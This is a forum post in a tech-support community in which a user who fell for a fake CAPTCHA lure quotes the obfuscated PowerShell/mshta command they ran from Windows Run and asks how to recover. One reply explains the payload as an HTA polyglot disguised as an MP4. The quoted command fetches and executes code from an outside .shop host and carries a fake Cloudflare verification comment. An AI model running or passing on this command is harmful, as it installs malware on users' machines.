amldvk@lemm.ee to

techsupport@lemmy.worldEnglish · 2 days ago

Help! I was hit with a fake Captcha attack

6

Help! I was hit with a fake Captcha attack

amldvk@lemm.ee to

techsupport@lemmy.worldEnglish · 2 days ago

I accidentally executed

POwErsHeLL -w 1 & \W*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\S*2\\\\\\\\\\\m*ht*e https://mnjk-jk.bsdfg-zmp-q-n.shop/1.mp4 # ✅ ''Ι am nοt a rοbοt: Clοudflare Verificatiοn ΙD: 715921''

via Windows Run a couple of days ago. Realized what I had done today after seeing a post on it.

What should I do? is full system wipe necessary? or can I remove it somehow?

If I need to do a system format what about attached drives and other devices on the network?

Chat

remotelove@lemmy.ca
link
fedilink
arrow-up
2·
2 days ago
This example is likely an HTA polyglot. An actual MP4 is merged with a binary, basically. The MP4 will play as normal, but the powershell is responsible for execution of the malware.

techsupport@lemmy.world

techsupport@lemmy.world

You are not logged in. However you can subscribe from another Fediverse account, for example Lemmy or Mastodon. To do this, paste the following into the search field of your instance: [email protected]

The Lemmy community will help you with your tech problems and questions about anything here. Do not be shy, we will try to help you.

If something works or if you find a solution to your problem let us know it will be greatly apreciated.

Rules: instance rules + stay on topic

Partnered communities:

You Should Know

Recommendations

Visibility: Public

This community can be federated to other instances and be posted/commented in by their users.

20 users / day
323 users / week
477 users / month
1.34K users / 6 months
1 local subscriber
2.72K subscribers
434 Posts
2.77K Comments
Modlog

mods:
GatoB@lemmy.world